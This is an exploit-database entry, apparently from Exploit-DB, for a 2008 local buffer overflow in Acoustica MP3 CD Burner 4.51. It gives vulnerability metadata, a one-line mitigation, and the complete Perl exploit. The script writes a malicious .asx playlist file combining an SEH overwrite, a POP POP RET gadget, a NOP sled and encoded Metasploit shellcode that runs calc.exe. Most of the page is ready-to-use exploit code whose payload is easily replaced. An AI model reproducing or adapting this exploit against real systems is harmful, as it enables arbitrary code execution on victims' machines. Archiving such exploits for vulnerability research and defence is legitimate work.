Acoustica MP3 CD Burner (asx file) Local BOF Exploit

vendor:

MP3 CD Burner

by:

Koshi

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: MP3 CD Burner

Affected Version From: 4.51 Build 147

Affected Version To: 4.51 Build 147

Patch Exists: YES

Related CWE: N/A

CPE: a:acoustica:mp3_cd_burner

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2008

Acoustica MP3 CD Burner (asx file) Local BOF Exploit

This exploit is based off of n00b's findings and is used to execute arbitrary code on the vulnerable system. It is a buffer overflow exploit which takes advantage of a vulnerability in Acoustica MP3 CD Burner version 4.51 Build 147 and possibly older versions. It is tested on Windows XP SP3 Fully Patched.

Mitigation:

Update to the latest version of Acoustica MP3 CD Burner.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#
# Acoustica MP3 CD Burner (asx file) Local BOF Exploit
# Author: Koshi
#
# Date: 08-29-08 ( 0day )
# Application: Acoustica MP3 CD Burner
# Version: 4.51 Build 147 ( possibly older )
# Site: http://acoustica.com/download.htm
# Tested On: Windows XP SP3 Fully Patched
#
# Based off of n00b's findings http://www.milw0rm.com/exploits/4017
# gr33tz: Rima my baby, str0ke, n00b ( nice find )


# win32_exec -  EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66".
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x76\x42\x32\x42\x41\x32".
"\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x49\x79\x4b\x4c\x4d".
"\x38\x43\x74\x67\x70\x63\x30\x67\x70\x4c\x4b\x41\x55\x37\x4c\x6c".
"\x4b\x41\x6c\x73\x35\x53\x48\x64\x41\x4a\x4f\x6c\x4b\x70\x4f\x67".
"\x68\x6c\x4b\x41\x4f\x57\x50\x45\x51\x5a\x4b\x53\x79\x4e\x6b\x74".
"\x74\x6c\x4b\x76\x61\x38\x6e\x64\x71\x59\x50\x6e\x79\x4e\x4c\x6b".
"\x34\x79\x50\x63\x44\x73\x37\x4a\x61\x69\x5a\x44\x4d\x76\x61\x6b".
"\x72\x7a\x4b\x4b\x44\x35\x6b\x50\x54\x77\x54\x65\x54\x71\x65\x4d".
"\x35\x6e\x6b\x61\x4f\x64\x64\x65\x51\x7a\x4b\x63\x56\x4c\x4b\x56".
"\x6c\x50\x4b\x4e\x6b\x43\x6f\x47\x6c\x65\x51\x6a\x4b\x6c\x4b\x55".
"\x4c\x6c\x4b\x64\x41\x68\x6b\x6d\x59\x63\x6c\x45\x74\x75\x54\x59".
"\x53\x36\x51\x4b\x70\x71\x74\x6e\x6b\x67\x30\x30\x30\x6f\x75\x6b".
"\x70\x30\x78\x64\x4c\x4c\x4b\x37\x30\x44\x4c\x6e\x6b\x54\x30\x47".
"\x6c\x6e\x4d\x6e\x6b\x53\x58\x75\x58\x6a\x4b\x76\x69\x4e\x6b\x6b".
"\x30\x6c\x70\x37\x70\x47\x70\x35\x50\x4c\x4b\x50\x68\x57\x4c\x51".
"\x4f\x35\x61\x6c\x36\x63\x50\x52\x76\x4f\x79\x6c\x38\x6b\x33\x6f".
"\x30\x31\x6b\x36\x30\x33\x58\x73\x4e\x69\x48\x6b\x52\x44\x33\x55".
"\x38\x6d\x48\x4b\x4e\x4d\x5a\x74\x4e\x50\x57\x4b\x4f\x48\x67\x71".
"\x73\x62\x41\x32\x4c\x45\x33\x56\x4e\x55\x35\x61\x68\x31\x75\x75".
"\x50\x66";

my $bof = "A"x480;
my $led = "\x90"x35;
my $fill = "\x90"x150;
my $buff = "".
	   "$bof".
	   "\xeb\x06\x90\x90". ### Pointer to next SEH record			   ###
	   "\x65\x82\x19\x01". ### SE handler wmaengine.dll POP POP RET 0x01198265 ###
	   "$led".
	   "$shellcode".
	   "$fill";

my $tuff = "".
	   "<ASX VERSION\=\x22\x33\x2e\x30\x22\x3e\n".
	   "<ENTRY>\n".
	   "<TITLE>Acoustica MP3 CD Burner Local BOF Exploit</TITLE>\n".
	   "<REF HREF=\x22$buff.asf\x22\x2f\x3e\n".
	   "</ENTRY>\n</ASX>\n";

open (MYFILE, '>>Exploit.asx');
binmode(MYFILE);
print MYFILE "$tuff";
close (MYFILE);
print "Exploit file has been created. ( Exploit.asx )\n";

# milw0rm.com [2008-08-29]